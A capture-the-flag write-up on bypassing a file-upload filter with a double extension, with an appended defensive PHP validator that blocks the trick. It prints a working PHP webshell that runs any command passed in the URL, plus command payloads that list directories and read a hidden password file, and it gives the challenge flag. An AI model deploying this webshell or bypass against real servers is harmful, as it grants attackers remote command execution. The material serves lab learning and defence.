File-upload-Double-extensions | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.


Here we try to upload our webshell.php file:

<?php
if (isset($_GET['cmd'])) {
    echo "<pre>" . system($_GET['cmd']) . "</pre>";
}
?>

However, we get this message: Wrong file extension !, so let's manually add the extension .jpg via Burp Repeater.

Now I look for the .passwd file. Just insert this payload: ?cmd=ls . -la, and if it is not there, move down: ?cmd=ls ../.. -la

The last payload will be: cat ../../../.passwd

Flag: Gg9LRz-hWSxqqUKd77-_q-6G8
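
The double-extension bypass above, seen from the defender's side: this is an added example, not code from the challenge or from the original writeup, and the challenge's own server-side check is not shown on the page. The function name `safe_upload_name`, the allow-lists and the sample files are assumptions made for illustration.

```php
<?php
// Added example: hypothetical upload validator, not the challenge's code.
const ALLOWED_EXT  = ['jpg', 'jpeg', 'png', 'gif'];
const ALLOWED_MIME = ['image/jpeg', 'image/png', 'image/gif'];

/**
 * Returns a safe server-side file name for an upload, or null to reject it.
 * $clientName is the name sent by the client, $tmpPath the uploaded temp file.
 */
function safe_upload_name(string $clientName, string $tmpPath): ?string
{
    // Split on every dot: "webshell.php.jpg" -> ["webshell", "php", "jpg"].
    $parts = explode('.', strtolower(basename($clientName)));
    array_shift($parts); // drop the base name, keep every extension segment

    // Require exactly one extension, and it must be on the allow-list.
    // This rejects "webshell.php", "webshell.php.jpg", ".htaccess" and "a.jpg.".
    if (count($parts) !== 1 || !in_array($parts[0], ALLOWED_EXT, true)) {
        return null;
    }

    // Derive the content type from the file's bytes, not from the request.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!in_array($mime, ALLOWED_MIME, true)) {
        return null;
    }

    // Never reuse the client's name: random base name, single known extension.
    return bin2hex(random_bytes(16)) . '.' . $parts[0];
}

// Constructed sample files: one PHP script, one minimal GIF header.
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, '<?php echo 1; ?>');
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, "GIF89a\x01\x00\x01\x00\x00\x00\x00;");

$cases = [['webshell.php', $php], ['webshell.php.jpg', $php], ['photo.gif', $gif]];
foreach ($cases as [$name, $path]) {
    $stored = safe_upload_name($name, $path);
    echo str_pad($name, 18), $stored === null ? 'rejected' : "stored as $stored", PHP_EOL;
}
unlink($php);
unlink($gif);
```

A content-type check alone can be satisfied by a file that starts with valid image bytes, so the random single-extension name matters most, together with serving the upload directory with script execution disabled.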